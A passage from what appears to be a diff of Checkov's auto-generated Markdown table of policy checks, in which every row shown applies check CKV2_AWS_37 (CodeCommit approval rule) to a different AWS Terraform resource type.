CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1070 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1071 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1072 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1073 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1074 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1075 | CKV2_AWS_37 | resource | aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1076 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1077 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1078 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1079 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1080 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1081 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1082 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1083 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1084 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1085 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1086 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1087 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1088 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1089 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1090 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1091 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1092 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1093 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1094 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1095 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1096 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1097 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1098 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1099 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1100 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1101 | CKV2_AWS_37 | resource | aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1102 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1103 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1104 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1105 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1106 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1107 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1108 | CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1109 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1110 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1111 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1112 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1113 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1114 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1115 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1116 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1117 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1118 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1119 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1120 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1121 | CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1122 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1123 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1124 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1125 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1126 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1127 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1128 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1129 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1130 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1131 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1132 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1133 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1134 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1135 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1136 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1137 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1138 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1139 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1140 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1141 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1142 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1143 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1144 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1145 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1146 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1147 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1148 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1149 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1150 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1151 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1152 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1153 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1154 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1155 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1156 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1157 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1158 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1159 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1160 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1161 | CKV2_AWS_37 | resource | aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1162 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1163 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1164 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1165 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1166 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1167 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1168 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1169 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1170 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1171 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1172 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1173 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | 